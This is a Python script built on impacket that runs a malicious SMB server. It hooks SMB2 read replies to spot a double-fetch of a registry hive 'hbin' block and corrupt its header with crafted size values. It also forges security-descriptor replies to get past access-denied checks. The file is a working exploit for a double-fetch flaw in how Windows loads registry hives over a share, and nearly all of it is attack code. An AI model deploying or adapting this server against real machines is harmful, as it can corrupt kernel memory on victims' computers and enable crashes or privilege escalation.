import argparse
import logging
import random
import string
import struct
import sys

from impacket.examples import logger
from impacket import smbserver, version, smb3structs as smb2
from impacket.ntlm import compute_lmhash, compute_nthash
from six.moves import configparser

smb2QueryInfoHandler = None
smb2ReadHandler = None
lastReadLength = 0

def smb2ReadHook(connId, smbServer, recvPacket):
    global smb2ReadHandler
    global lastReadLength
    
    respSMBCommand, packets, errorCode = smb2ReadHandler(connId, smbServer, recvPacket)

    Data = respSMBCommand[0]['Buffer']
    DataLength = respSMBCommand[0]['DataLength']

    if errorCode == 0:
        readRequest = smb2.SMB2Read(recvPacket['Data'])

        currReadLength = readRequest['Length']
        currReadOffset = readRequest['Offset']

        smbServer.log('Read request offset %x, length %x' % (currReadOffset, currReadLength))

        if (currReadLength == 0x1000) and (lastReadLength == 0x3000) and ((currReadOffset & 0xff000) == 0xff000) and Data[:4] == b'hbin':
            smbServer.log('Detected hbin double-fetch, corrupting the header...')
            Data = Data[:4] + struct.pack('<II', 0x66660000, 0x66660000) + Data[12:32] + struct.pack('<I', 0x66660000 - 0x20) + Data[36:]
            respSMBCommand[0]['Buffer'] = Data

        lastReadLength = currReadLength

    return respSMBCommand, packets, errorCode

def smb2QueryInfoHook(connId, smbServer, recvPacket):
    global smb2QueryInfoHandler

    respSMBCommand, packets, errorCode = smb2QueryInfoHandler(connId, smbServer, recvPacket)

    if errorCode == 0xc0000022:
        queryInfo = smb2.SMB2QueryInfo(recvPacket['Data'])

        if queryInfo['InfoType'] == smb2.SMB2_0_INFO_SECURITY:
            securityDescriptor = ('\x01\x00\x04\x80\x30\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00' +
                                  '\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00' +
                                  '\x3f\x00\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00' +
                                  '\x01\x02\x00\x00\x00\x00\x00\x05\x20\x00\x00\x00\x20\x02\x00\x00' +
                                  '\x01\x02\x00\x00\x00\x00\x00\x05\x20\x00\x00\x00\x20\x02\x00\x00')

            if queryInfo['OutputBufferLength'] == 0:
                smbServer.log('Sending security descriptor length')
                infoRecord = b'\x04\x00\x00\x00\x00\x00\x00\x00' + struct.pack('<I', len(securityDescriptor))
                errorCode = 0xc0000023
            else:
                smbServer.log('Sending security descriptor data')
                infoRecord = securityDescriptor
                errorCode = 0

            respSMBCommand[0]['OutputBufferLength'] = len(infoRecord)
            respSMBCommand[0]['Buffer'] = infoRecord

    return respSMBCommand, packets, errorCode

if __name__ == '__main__':

    #
    # Parse options
    #

    print(version.BANNER)

    parser = argparse.ArgumentParser(add_help = True, description = "This script will launch a SMB Server and add a "
                                     "share specified as an argument. You need to be root in order to bind to port 445. "
                                     "Example: smbserver.py TMP /tmp")

    parser.add_argument('shareName', action='store', help='name of the share to add')
    parser.add_argument('sharePath', action='store', help='path of the share to add')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    try:
       options = parser.parse_args()
    except Exception as e:
       logging.critical(str(e))
       sys.exit(1)

    logger.init(True)

    #
    # Configure the SMB2 server
    #

    smbConfig = configparser.ConfigParser()
    smbConfig.add_section('global')
    smbConfig.set('global', 'server_name',
                         ''.join([random.choice(string.ascii_letters) for _ in range(8)]))
    smbConfig.set('global', 'server_os', ''.join([random.choice(string.ascii_letters) for _ in range(8)])
                         )
    smbConfig.set('global', 'server_domain',
                         ''.join([random.choice(string.ascii_letters) for _ in range(8)])
                         )
    smbConfig.set('global', 'log_file', 'None')
    smbConfig.set('global', 'rpc_apis', 'yes')
    smbConfig.set('global', 'credentials_file', '')
    smbConfig.set('global', 'challenge', "A" * 16)

    smbConfig.add_section('IPC$')
    smbConfig.set('IPC$', 'comment', '')
    smbConfig.set('IPC$', 'read only', 'yes')
    smbConfig.set('IPC$', 'share type', '3')
    smbConfig.set('IPC$', 'path', '')

    share = options.shareName.upper()
    smbConfig.add_section(share)
    smbConfig.set(share, 'comment', '')
    smbConfig.set(share, 'read only', 'no')
    smbConfig.set(share, 'share type', '0')
    smbConfig.set(share, 'path', options.sharePath)

    smbConfig.set('global', 'SMB2Support', 'True')

    server = smbserver.SMBSERVER(('0.0.0.0', 445))
    server.setServerConfig(smbConfig)
    server.processConfigFile()

    # Set up our custom hooks
    smb2QueryInfoHandler = server.hookSmb2Command(smb2.SMB2_QUERY_INFO, smb2QueryInfoHook)
    smb2ReadHandler = server.hookSmb2Command(smb2.SMB2_READ, smb2ReadHook)

    # Start the server
    server.serve_forever()
